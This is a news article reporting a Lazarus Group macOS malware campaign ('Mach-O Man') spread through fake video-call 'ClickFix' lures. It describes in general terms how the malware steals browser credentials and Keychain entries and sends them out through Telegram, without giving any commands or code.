Security researchers have identified a new macOS malware campaign linked to the Lazarus Group, a notorious hacking operation associated with North Korea. This campaign, flagged on Tuesday, utilizes a malware kit known as “Mach-O Man,” which is disseminated through social engineering tactics under the guise of “ClickFix.” According to Mauro Eldritch, an offensive security expert and founder of BCA Ltd., the malware primarily targets both traditional businesses and crypto companies.
Victims are enticed into fake Zoom or Google Meet calls, where they are instructed to execute commands that silently download the malware in the background. This method allows attackers to evade traditional security measures, gaining unauthorized access to sensitive credentials and corporate systems. The implications of this malware campaign are severe, potentially leading to account takeovers, unauthorized access to infrastructure, financial losses, and the exposure of critical data.
The Lazarus Group has been implicated in some of the most significant cryptocurrency thefts, including the notorious $1.4 billion hack of Bybit exchange in 2025, marking it as the largest theft in the industry to date. The “Mach-O Man” kit is designed to implement hidden stealer malware, which extracts sensitive information such as browser extension data, stored browser credentials, cookies, and macOS Keychain entries from compromised devices.
Once the data is collected, it is archived into a zip file and sent to the attackers via Telegram. The malware also features a self-deletion script that removes all traces of the kit using the system’s rm command, bypassing user confirmation and permissions. This sophisticated malware was reconstructed by Eldritch through the macOS analysis capabilities of cloud-based malware sandbox Any.run.
Earlier this year, North Korean hackers employed AI-driven social engineering tactics to steal approximately $100,000 from a crypto wallet, demonstrating the evolving strategies used by these cybercriminals. The ongoing threat posed by the Lazarus Group highlights the need for enhanced security measures within the crypto and fintech sectors to safeguard against such sophisticated attacks.
